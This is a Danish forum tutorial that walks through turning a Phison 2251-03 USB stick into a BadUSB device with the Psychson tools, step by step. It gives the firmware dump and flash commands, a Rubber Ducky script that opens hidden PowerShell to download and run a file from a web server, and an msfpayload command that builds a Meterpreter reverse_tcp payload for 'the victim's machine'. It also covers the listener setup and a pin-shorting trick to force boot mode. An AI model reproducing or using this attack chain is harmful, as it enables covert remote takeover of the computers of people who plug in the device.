<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Et Burner Image</span></span>: <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://www.usbdev.ru/files/phison/" target="_blank" rel="noopener" class="mycode_url">http://www.usbdev.ru/files/phison/</a> </blockquote>
- Dette er et krav for at gemme samt installere firmware. <br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Et USB stik med Phison <span style="text-decoration: underline;" class="mycode_u">2251-03 (2303)</span> Chipset</span></span> – Dette er indtil videre den eneste understøttede chip.<br />
Her har jeg valgt at benytte en <span style="text-decoration: underline;" class="mycode_u">SanDisk Ultra 16Gb USB 3.0</span> fra følgende shop: <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://www.bj-trading.dk/bjshop/default.asp?side=info.asp&amp;vare=939986&amp;f=pricr&amp;psn=68,64" target="_blank" rel="noopener" class="mycode_url">http://www.bj-trading.dk/bjshop/default....&amp;psn=68,64</a></blockquote>
<br />
(<span style="font-style: italic;" class="mycode_i"><span style="color: #FFFFE0;" class="mycode_color">Understøttede enheder kan ses her</span></span>: <br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://github.com/adamcaudill/Psychson/wiki/Known-Supported-Devices" target="_blank" rel="noopener" class="mycode_url">https://github.com/adamcaudill/Psychson/...ed-Devices</a></blockquote>
-<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Vær dog opmærksom på, at der af en eller anden grund kan være forskellige chipsets i disse enheder, så bestil et par stykker</span></span>)<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">En Rubber Ducky Payload</span></span> – Dette er selve tastetrykkene, som firmwaren udfører når enheden er registreret<br />
(<span style="font-style: italic;" class="mycode_i">Diverse Payloads kan findes i deres Wiki</span>:<br />
 <blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads" target="_blank" rel="noopener" class="mycode_url">https://github.com/hak5darren/USB-Rubber...i/Payloads</a></blockquote>
 -<br />
 <span style="font-style: italic;" class="mycode_i">Eller ved et kig på Hak5s forum</span>:<br />
 <blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/" target="_blank" rel="noopener" class="mycode_url">https://forums.hak5.org/index.php?/forum...ber-ducky/</a></blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">En RAT Payload</span></span> – Dette kan være en hvilket som helst RAT eller eksekverbar fil til tests. I mit tilfælde vil jeg som altid bruge <span style="text-decoration: underline;" class="mycode_u">Meterpreter</span> <br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">En webserver</span></span> – Da vi bruger <span style="font-weight: bold;" class="mycode_b">Wget</span> i dette eksempel, skal vi også bruge en server til at hoste vores Meterpreter Payload. </span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #1</span></span><br />
<span style="font-weight: bold;" class="mycode_b">Installér Small Device C Compiler (SDCC)</span> til følgende mappe: <span style="text-decoration: underline;" class="mycode_u">C:\Program Files\SDCC</span><br />
I<span style="font-weight: bold;" class="mycode_b"> mit tilfælde</span> installerer jeg til <span style="font-weight: bold;" class="mycode_b">drev C</span>, men dette kan selvfølgelig forekomme anderledes hos andre installationer. <span style="text-decoration: underline;" class="mycode_u">Det er her en god ide at installere SDCC til samme drev/partition som indeholder jeres Windows installation.</span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #2</span></span><br />
Da jeg har valgt at køre en <span style="font-weight: bold;" class="mycode_b">Payload der benytter Wget</span>, skal jeg også have en <span style="font-weight: bold;" class="mycode_b">server</span> kørende, for at hoste vores <span style="font-weight: bold;" class="mycode_b">Meterpreter Payload</span>. Dette kan være en <span style="font-weight: bold;" class="mycode_b">webhost, VPS, fildelingstjenester</span> osv. Selv vil jeg til dette eksempel bruge en<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u"> simpel lokal XAMPP opsætning</span></span>, men <span style="font-weight: bold;" class="mycode_b">Apache</span> kan ligeledes bruges. <span style="font-style: italic;" class="mycode_i">XAMPP er installér-og-kør, så der er ingen grund til at gå i dybden med det. </span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #4682B4;" class="mycode_color">Hvis du vælger at benytte dig af mine for-kompilerede filer, så kan du springe Trin #1 over</span></span>.<br />
</span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #3</span></span><br />
Kompiler <span style="font-weight: bold;" class="mycode_b">DriveCom, EmbedPayload og Injector</span> ved at <span style="text-decoration: underline;" class="mycode_u">åbne deres tilhørende .sln filer en ad gangen i Visual Studio/C++ 2012 eller 2013</span>. <span style="font-weight: bold;" class="mycode_b">Tryk</span> herefter på den <span style="text-decoration: underline;" class="mycode_u">øverste menulinie</span> hvor der står <span style="font-weight: bold;" class="mycode_b">’build’</span> og <span style="font-weight: bold;" class="mycode_b">tryk</span> <span style="font-weight: bold;" class="mycode_b">’Build solution’</span>. <span style="text-decoration: underline;" class="mycode_u">Dette kompilerer værktøjerne til <span style="font-weight: bold;" class="mycode_b">Tools</span> undermappen under <span style="font-weight: bold;" class="mycode_b">Psychson</span> hovedmappen.</span><br />
<br />
<img src="http://anony.ws/i/2014/10/22/build.png" alt="[Billede: build.png]" class="mycode_img" />  <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #4</span></span><br />
Nu kan vi bruge værktøjet <span style="font-weight: bold;" class="mycode_b">DriveCom</span> <span style="text-decoration: underline;" class="mycode_u">til at sikre os, at vi også har det rigtige hardware i vores USB stik</span>.<br />
<span style="font-weight: bold;" class="mycode_b">Åbn kommandovinduet/CMD</span> i <span style="font-weight: bold;" class="mycode_b">Tools</span> undermappen under <span style="text-decoration: underline;" class="mycode_u">Psychson</span> hovedmappen.<br />
Herfra kan vi bruge <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>, til at få <span style="text-decoration: underline;" class="mycode_u">informationerne fra vores USB enhed</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=GetInfo</blockquote>
<span style="font-weight: bold;" class="mycode_b">drive</span> skal pege på<span style="text-decoration: underline;" class="mycode_u"> bogstavet der repræsenterer vores USB enhed</span>, <span style="font-style: italic;" class="mycode_i">I mit tilfælde er enheden monteret på <span style="font-weight: bold;" class="mycode_b">G</span></span>.<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Vil benytte mig af G for resten af denne tekst, så vær opmærksom på dette hvis jeres drev har et anderledes mærkat.</span></span><br />
 <br />
<blockquote class="mycode_quote"><cite>Citer:</cite>C:\Users\Balder\Desktop\Psychson-master\tools&gt;DriveCom.exe /drive=G /action=GetInfo<br />
Action specified: GetInfo<br />
Gathering information...<br />
Reported chip type: 2303<br />
Reported chip ID: D0-51-24-1B-00-00<br />
Reported firmware version: 254.07.00<br />
Mode: Unknown</blockquote>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #5</span></span><br />
Nu skal vi have fat I et <span style="font-weight: bold;" class="mycode_b">Burner Image</span>, så vi kan <span style="text-decoration: underline;" class="mycode_u">gemme den gamle firmware allerede installeret på vores enhed, samt installere/flashe vores nye firmware efter vi har modificeret den</span>.<br />
<span style="font-weight: bold;" class="mycode_b">Gå ind på</span> <a href="http://www.usbdev.ru/files/phison/" target="_blank" rel="noopener" class="mycode_url">http://www.usbdev.ru/files/phison/</a> og <span style="font-weight: bold;" class="mycode_b">søg</span> (<span style="font-weight: bold;" class="mycode_b">Ctrl + F i Chrome</span>) efter ’<span style="font-weight: bold;" class="mycode_b">Additional Files</span>’.<br />
<span style="font-weight: bold;" class="mycode_b">Tredje resultat</span> vil her give os en <span style="font-weight: bold;" class="mycode_b">liste</span> over <span style="text-decoration: underline;" class="mycode_u">arkiver med firmware filer</span>, og da vi benytter os af <span style="font-weight: bold;" class="mycode_b">PS2251-03 – også kaldet 2303</span>, <span style="text-decoration: underline;" class="mycode_u">downloader vi følgende fil</span>: <br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Firmware PS2251-03 [BN03*.BIN, FW03*.BIN] {BN – 7 files; FW – 12 files} ; firmware_ps2251-03.rar; size: 787 304 bytes</blockquote>
I <span style="font-weight: bold;" class="mycode_b">firmware_ps2251-03.rar arkivet</span> finder vi filen <span style="font-weight: bold;" class="mycode_b">’BN03V104M.BIN’</span>. <span style="text-decoration: underline;" class="mycode_u">Dette er vores <span style="font-weight: bold;" class="mycode_b">Burner Image</span></span>.<br />
<span style="font-weight: bold;" class="mycode_b">BN</span> – Dette går jeg ud fra er et <span style="text-decoration: underline;" class="mycode_u">prefix for Burner Image</span>.<br />
<span style="font-weight: bold;" class="mycode_b">03</span> – Dette er vores <span style="text-decoration: underline;" class="mycode_u">controller version</span>.<br />
<span style="font-weight: bold;" class="mycode_b">V104</span> – Dette er <span style="text-decoration: underline;" class="mycode_u">versionen</span> på <span style="text-decoration: underline;" class="mycode_u">vores Burner Image</span>.<br />
<span style="font-weight: bold;" class="mycode_b">M</span> – Indikerer at vores <span style="text-decoration: underline;" class="mycode_u">Burner Image er tiltænkt 8K NAND chips</span>. <span style="font-style: italic;" class="mycode_i">(ifølge deres Wiki benyttes dette af alle deres testede USB 3.0 enheder)</span><br />
<br />
Lad os <span style="font-weight: bold;" class="mycode_b">placere filen</span> I vores ’<span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Tools</span></span>’ mappe, så vi <span style="text-decoration: underline;" class="mycode_u">ikke behøver at skrive fuld sti når vi skal arbejde med den</span>.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #6</span></span><br />
Nu ville det være smart at <span style="font-weight: bold;" class="mycode_b">gemme vores gamle firmware</span>, både så vi har en <span style="font-weight: bold;" class="mycode_b">backup</span> til hvis det skulle <span style="font-weight: bold;" class="mycode_b">gå galt</span>, men også så vi har <span style="font-weight: bold;" class="mycode_b">firmware der kan patches</span>, <span style="text-decoration: underline;" class="mycode_u">hvis den generede firmware nu ikke virker.</span><br />
I vores <span style="font-weight: bold;" class="mycode_b">kommandovindue fra før</span>, skriver vi <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=SetBootMode</blockquote>
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>C:\Users\Balder\Desktop\Psychson-master\tools&gt;DriveCom.exe /drive=G /action=SetBootMode<br />
Action specified: SetBootMode</blockquote>
<br />
Nu er <span style="font-weight: bold;" class="mycode_b">vores enhed</span> sat i <span style="font-weight: bold;" class="mycode_b">Boot Mode,</span> og vi kan nu fortsætte med at <span style="text-decoration: underline;" class="mycode_u">sende vores Burner Image til enheden</span>, ved hjælp af <span style="font-weight: bold;" class="mycode_b">følgende kommando:</span><br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=SendExecutable /burner=BN03V104M.BIN</blockquote>
<br />
Hvor <span style="font-weight: bold;" class="mycode_b">burner</span> er det <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Burner Image</span> vi hentede før</span>.<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>C:\Users\Balder\Desktop\Psychson-master\tools&gt;DriveCom.exe /drive=G /action=SendExecutable /burner=BN03V104M.BIN<br />
Action specified: SendExecutable</blockquote>
<br />
Nu er vores<span style="font-weight: bold;" class="mycode_b"> Burner Image</span> så klar til at <span style="text-decoration: underline;" class="mycode_u">dumpe/gemme den gamle firmware fra enheden</span>. Dette klares med <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=DumpFirmware /firmware=GammelFirmware.BIN</blockquote>
<br />
Hvor <span style="font-weight: bold;" class="mycode_b">firmware</span> er <span style="text-decoration: underline;" class="mycode_u">navnet vi ønsker at gemme vores firmware som</span>. I<span style="text-decoration: underline;" class="mycode_u"> dette tilfælde</span> kalder vi det bare ’<span style="font-weight: bold;" class="mycode_b">GammelFirmware.BIN’</span>.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Denne fil </span>er nu gemt i vores ’<span style="font-weight: bold;" class="mycode_b">Tools</span>’ mappe.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #7</span></span><br />
<span style="font-weight: bold;" class="mycode_b">Har her valgt at bruge den firmware de har skrevet til formålet, i stedet for at patche filen vi gemte i sidste trin</span>.<br />
I <span style="font-weight: bold;" class="mycode_b">kommandovinduet</span> hopper vi tilbage til <span style="font-weight: bold;" class="mycode_b">Psychson mappen</span>, og herefter ind i <span style="font-weight: bold;" class="mycode_b">firmware mappen</span>.<br />
Dette kan gøres ved <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>cd ../firmware</blockquote>
Nu <span style="font-weight: bold;" class="mycode_b">kører</span> vi så bare <span style="font-weight: bold;" class="mycode_b">build.bat</span> i <span style="text-decoration: underline;" class="mycode_u">samme kommandovindue</span>, og ganske få sekunder efter, vil en <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">række filer</span> være tilgængelige i en ny ’<span style="font-weight: bold;" class="mycode_b">bin</span>’ mappe inde under ’<span style="font-weight: bold;" class="mycode_b">firmware</span>’ mappen</span>.<br />
Inde i ’<span style="font-weight: bold;" class="mycode_b">bin</span>’ mappen <span style="font-weight: bold;" class="mycode_b">kopierer</span> vi en af de nye filer – <span style="font-weight: bold;" class="mycode_b">fw.bin</span> ind i vores ’<span style="font-weight: bold;" class="mycode_b">Tools</span>’ mappe, <span style="text-decoration: underline;" class="mycode_u">så vi igen slipper for at angive sti, og holder det hele samlet.</span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #8</span></span><br />
Nu skal vi så have fat i en <span style="font-weight: bold;" class="mycode_b">Rubber Ducky Payload</span>. Disse kan findes i de to links jeg skrev oppe i ’<span style="font-weight: bold;" class="mycode_b">krav</span>’ afsnittet. Jeg vil i denne tekst benytte mig af <span style="font-weight: bold;" class="mycode_b">følgende Payload</span>, som <span style="font-weight: bold;" class="mycode_b">åbner Powershell, WGET’er min RAT Payload, og eksekverer/kører denne</span>. <span style="font-style: italic;" class="mycode_i">(Powershell virker fra Vista og op efter)</span>:<br />
<a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute" target="_blank" rel="noopener" class="mycode_url">https://github.com/hak5darren/USB-Rubber...---execute</a><br />
<blockquote class="mycode_quote"><cite>Citer:</cite>GUI r<br />
DELAY 100<br />
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"<br />
ENTER</blockquote>
<br />
Der dog også findes i en lidt anderledes udgave, som <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">gemmer Powershell vinduet</span>, så det bliver lidt mere ’<span style="font-weight: bold;" class="mycode_b">stealth</span>’</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>GUI r<br />
DELAY 100<br />
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"<br />
ENTER</blockquote>
<br />
Da jeg benytter mig af en <span style="font-weight: bold;" class="mycode_b">lokal server på netværket</span>, ændrer jeg <span style="font-weight: bold;" class="mycode_b">ovenstående URL</span> i vores Ducky Script til <span style="text-decoration: underline;" class="mycode_u">dennes lokale IP</span> - <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://192.168.0.106/bob.old" target="_blank" rel="noopener" class="mycode_url">http://192.168.0.106/bob.old</a></blockquote>
<br />
Dette script skal så <span style="font-weight: bold;" class="mycode_b">encodes til binær form</span>, så det kan <span style="font-weight: bold;" class="mycode_b">sammenkædes med vores enheds firmware</span>. Dette kan gøres <span style="font-weight: bold;" class="mycode_b">online</span> på <a href="http://www.ducktoolkit.com/Encoder.jsp" target="_blank" rel="noopener" class="mycode_url">http://www.ducktoolkit.com/Encoder.jsp</a> - Her skal vores script bare <span style="font-weight: bold;" class="mycode_b">kopieres ind</span> og <span style="font-weight: bold;" class="mycode_b">Keyboard Layout skiftes til Denmark</span>. Så trykker vi på ’<span style="font-weight: bold;" class="mycode_b">Generate Script</span>’, og herefter <span style="font-weight: bold;" class="mycode_b">’Download .bin</span>’. <span style="text-decoration: underline;" class="mycode_u">Dette downloader en fil ved navn ’<span style="font-weight: bold;" class="mycode_b">inject.bin</span>’, som indeholder vores encoded script. </span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Kopier eller flyt</span> <span style="text-decoration: underline;" class="mycode_u">denne fil</span> over i din <span style="font-weight: bold;" class="mycode_b">tools</span> mappe, så vi kan fortsætte med at sammenkæde den med vores firmware (<span style="font-weight: bold;" class="mycode_b">fw.bin</span>) fil.<br />
<span style="font-weight: bold;" class="mycode_b">I vores tidligere</span> – eller i et nyt <span style="font-weight: bold;" class="mycode_b">kommandovindue</span> skal vi nu <span style="text-decoration: underline;" class="mycode_u">tilbage til vores '<span style="font-weight: bold;" class="mycode_b">tools</span>' mappe</span>. Dette kan lige som før gøres ved <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>:<br />
 <blockquote class="mycode_quote"><cite>Citer:</cite>cd ../tools</blockquote>
 - <span style="font-weight: bold;" class="mycode_b">Eller</span> ved at åbne et <span style="font-weight: bold;" class="mycode_b">nyt kommandovindue</span> ved at <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">holde shift inde</span>, <span style="font-weight: bold;" class="mycode_b">højreklikke på mappen</span> og vælge '<span style="font-weight: bold;" class="mycode_b">åbn kommandovindue her</span>'.</span><br />
Her vil vi bruge <span style="font-weight: bold;" class="mycode_b">injector.exe</span> til at <span style="text-decoration: underline;" class="mycode_u">injicere</span> vores <span style="text-decoration: underline;" class="mycode_u">Ducky Payload</span> (<span style="font-weight: bold;" class="mycode_b">inject.bin</span>) ind i vores <span style="text-decoration: underline;" class="mycode_u">firmware</span> (<span style="font-weight: bold;" class="mycode_b">fw.bin</span>) fil.<br />
<span style="text-decoration: underline;" class="mycode_u">Sørg for at begge filer er gemt i</span> <span style="font-weight: bold;" class="mycode_b">tools</span> mappen, og <span style="font-weight: bold;" class="mycode_b">kør følgende kommando</span>: <br />
<blockquote class="mycode_quote"><cite>Citer:</cite>injector.exe inject.bin fw.bin</blockquote>
For at sikre os, at vores<span style="font-weight: bold;" class="mycode_b"> firmware nu også er bevet injiceret</span>, kan vi tjekke <span style="font-weight: bold;" class="mycode_b">filens timestamp</span>. Hvis denne <span style="text-decoration: underline;" class="mycode_u">stemmer over ens</span> med <span style="font-weight: bold;" class="mycode_b">systemets klokkeslæt</span>, <span style="text-decoration: underline;" class="mycode_u">så ved vi at der er blevet arbejdet på filen</span>.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #9</span></span><br />
Nu skulle alt være klart til at vi kan <span style="font-weight: bold;" class="mycode_b">flashe</span> den <span style="font-weight: bold;" class="mycode_b">nye firmware</span> til <span style="font-weight: bold;" class="mycode_b">vores enhed</span>. <br />
<span style="text-decoration: underline;" class="mycode_u">Så længe vi ikke har haft frakoblet vores enhed fra USB porten</span>, skulle vi nu kunne køre <span style="font-weight: bold;" class="mycode_b">følgende kommando</span> for at <span style="text-decoration: underline;" class="mycode_u">sende den nye firmware til enhden og installere den ved hjælp af vores tidligere <span style="font-weight: bold;" class="mycode_b">Burner Image</span></span>:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=SendFirmware /burner=BN03V104M.BIN /firmware=fw.bin</blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b">burner</span> er samme <span style="font-weight: bold;" class="mycode_b">Burner Image</span> som vi <span style="text-decoration: underline;" class="mycode_u">benyttede tidligere</span>.<br />
<span style="font-weight: bold;" class="mycode_b">firmware</span> er vores <span style="text-decoration: underline;" class="mycode_u">genererede og modificerede firmware</span>.<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">(Hvis du har haft enheden [b]frakoblet</span> eller noget andet er <span style="font-weight: bold;" class="mycode_b">gået galt</span>, så brug den tidligere kommando til at ændre enheden til <span style="font-weight: bold;" class="mycode_b">Boot Mode</span> igen)</span>[/b]<br />
<br />
Nu skulle vores nye firmware være installeret på enhden, og være klar til brug.<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Næste trin går ud på at generere en Meterpreter Payload, så hvis du har en anden fil kan du springe dette over.</span></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #10</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Bob.old</span> er den<span style="text-decoration: underline;" class="mycode_u"> fil vi ønsker at eksekvere på vores offers maskine</span>.<br />
Det kan være alle former for eksekverbare filer, såsom en <span style="font-weight: bold;" class="mycode_b">DarkComet server</span> eller bare <span style="font-weight: bold;" class="mycode_b">Notepad</span> hvis der skal testes.<br />
Vil som så mange andre gange benytte mig af en <span style="font-weight: bold;" class="mycode_b">Meterpreter Payload</span>, for at gøre <span style="font-weight: bold;" class="mycode_b">præsentationen lidt realistisk</span>. Denne payload genererer jeg ved hjælp af Metasploit, som i dette tilfælde kører på Kali, men også findes til Windows. Med <span style="font-weight: bold;" class="mycode_b">Kali</span> kørende åbner jeg en ny <span style="font-weight: bold;" class="mycode_b">konsol/terminal</span> og indtaster <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">følgende kommando og parametre</span></span>:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=9191 X &gt; /root/Desktop/bob.old</blockquote>
Hvor <span style="font-weight: bold;" class="mycode_b">msfpayload</span> er <span style="font-style: italic;" class="mycode_i">modulet der genererer vores payload ud fra de givne parametre</span><br />
<span style="font-weight: bold;" class="mycode_b">LHOST</span> er vores <span style="text-decoration: underline;" class="mycode_u">Lokale værtscomputer, og skal pege på maskinen der skal modtage forbindelsen fra offerets computer.</span><br />
<span style="font-weight: bold;" class="mycode_b">LPORT</span> er <span style="text-decoration: underline;" class="mycode_u">porten værtscomputeren og offerets computer skal bruge til at oprette forbindelse og kommunikere.</span><br />
<span style="font-weight: bold;" class="mycode_b">windows/meterpreter/reverse_shell</span> er payload typen. For at se de forskellige payloads kan vi skrive '<span style="font-weight: bold;" class="mycode_b">show payloads</span>'. <span style="font-style: italic;" class="mycode_i">Meterpreter er ekstremt effektiv, og kan også genereres i en HTTPS version der krypterer kommunikationen ved hjælp af SSL.</span><br />
<span style="font-weight: bold;" class="mycode_b">X &gt; bob.old</span> specificerer <span style="text-decoration: underline;" class="mycode_u">placeringen samt filnavn på hvor vi vil gemme den genererede binære data til</span>. <span style="font-style: italic;" class="mycode_i">Gemmer den bare på skrivbordet, og flytter den over til min maskine der kører XAMPP. Man kan også bare gemme filen til /var/www - og herefter køre etc/init.d/apache2 start' for at hoste filen på vores <span style="font-weight: bold;" class="mycode_b">Kali maskine</span> og efterfølgende starte <span style="font-weight: bold;" class="mycode_b">Apache</span>. Hvis man vælger at gøre dette, skal <span style="font-weight: bold;" class="mycode_b">URL</span> selvfølgelig pege på <span style="font-weight: bold;" class="mycode_b">denne IP</span></span>.<br />
<br />
Her er et eksempel på hvordan det kan se ud. <span style="font-weight: bold;" class="mycode_b">Dette passer dog ikke til ovenstående, da det er taget fra en af mine andre tåde</span>:<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1916_53_44.png" alt="[Billede: Screenshotfrom2014-08-1916_53_44.png]" class="mycode_img" /><br />
<br />
Da jeg bruger <span style="font-weight: bold;" class="mycode_b">Meterpreter </span>skal jeg også opsætte en <span style="font-weight: bold;" class="mycode_b">handler</span> til at modtage <span style="font-weight: bold;" class="mycode_b">indgående forbindelser</span>. Her bruger jeg <span style="font-weight: bold;" class="mycode_b">Metasploits handler</span>, hvor<span style="font-weight: bold;" class="mycode_b"> LHOST</span> <span style="font-style: italic;" class="mycode_i">peger på IP adressen som skal modtage offerets forbindelse</span>, og <span style="font-weight: bold;" class="mycode_b">LPORT</span>, som er <span style="text-decoration: underline;" class="mycode_u">porten der skal sørge for de forbinder og kan kommunikere.</span><br />
<br />
<span style="color: #4682B4;" class="mycode_color">[size=x-largel]Nu har vi opsat vores <span style="font-weight: bold;" class="mycode_b">Firmware, Ducky Payload, Meterpreter Payload</span> (<span style="font-style: italic;" class="mycode_i">hosted på en lokal server</span>) og vores<span style="font-weight: bold;" class="mycode_b"> handler</span>.<span style="font-weight: bold;" class="mycode_b"> Hvis vi stikker enheden i USB-porten får vi et resultat i stil med første postede Youtube video</span></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #FF6347;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Hardware introduceret Boot Mode</span></span><br />
<br />
<span style="color: #FF6347;" class="mycode_color">Hvis vi nu ønsker at installere firmware IGEN, kan vi godt løbe ind i det problem, at vi ikke kan skifte enheden til BootMode ved hjælp af den tilhørende DriveCom software. </span><br />
<span style="font-weight: bold;" class="mycode_b">Hvis dette er tilfældet</span>, kan vi være nødsaget til at starte enheden op i <span style="font-weight: bold;" class="mycode_b">Boot Mode</span>, ved at <span style="font-weight: bold;" class="mycode_b">kortslutte specifikke stifter på chippen</span>.<br />
Dette billede bruger de selv i deres <span style="font-weight: bold;" class="mycode_b">doc mappe på Github</span> til at vise <span style="font-weight: bold;" class="mycode_b">hvor disse stifter er tilstede på deres</span> <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Patriot 8GB Supersonic Xpress</span></span> <span style="font-weight: bold;" class="mycode_b">enhed</span>:<br />
<br />
<img src="https://raw.githubusercontent.com/adamcaudill/Psychson/master/docs/PinsToShortUponPlugInForBootMode.jpg" alt="[Billede: PinsToShortUponPlugInForBootMode.jpg]" class="mycode_img" /><br />
<br />
I mit tilfælde bruger jeg en <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">SanDisk Ultra 16Gb USB 3.0</span></span>, <span style="text-decoration: underline;" class="mycode_u">og der sidder stifterne således</span>:<br />
<br />
<img src="http://anony.ws/i/2014/10/22/IMAG0905.jpg" alt="[Billede: IMAG0905.jpg]" class="mycode_img" /><br />
<br />
<img src="http://anony.ws/i/2014/10/22/IMAG0906.jpg" alt="[Billede: IMAG0906.jpg]" class="mycode_img" /><br />
<br />
Alt man skal gøre er at bruge en <span style="font-weight: bold;" class="mycode_b">metalgenstand såsom en nål eller kniv</span> til at <span style="font-weight: bold;" class="mycode_b">røre stifterne</span><span style="text-decoration: underline;" class="mycode_u"> før og imens man tilslutter enheden</span>. <span style="font-style: italic;" class="mycode_i">Dette kan godt være halv-svært at gøre uden et USB kabel</span>, <span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">men det er stadig muligt</span></span>. <br />
<span style="font-weight: bold;" class="mycode_b">Hold genstanden mod stifterne</span> <span style="text-decoration: underline;" class="mycode_u">før enheden bliver sat i USB porten</span>, og <span style="text-decoration: underline;" class="mycode_u">ca. et minuts tid</span> efter den er <span style="font-weight: bold;" class="mycode_b">registreret</span> og<span style="text-decoration: underline;" class="mycode_u"> LED lyset er blivende</span>. <span style="text-decoration: underline;" class="mycode_u">Hvis LED lyset blinker, har du ikke kortsluttet stifterne korrekt</span>.<br />
<span style="text-decoration: underline;" class="mycode_u">Hvis lyset derimod bliver ved med at lyse</span>, så skulle enheden <span style="text-decoration: underline;" class="mycode_u">igennem dens hardware</span> være i <span style="font-weight: bold;" class="mycode_b">Boot Mode</span> igen, og trinnene kan gennemgåes igen. Da vi kan <span style="font-weight: bold;" class="mycode_b">generere firmware og Ducky Payloads </span><span style="text-decoration: underline;" class="mycode_u">uden brug af enheden</span>, er det sådan set <span style="font-weight: bold;" class="mycode_b">kun ved firmware flashing/installation dette trin skal gennemgåes</span>.<br />
<br />
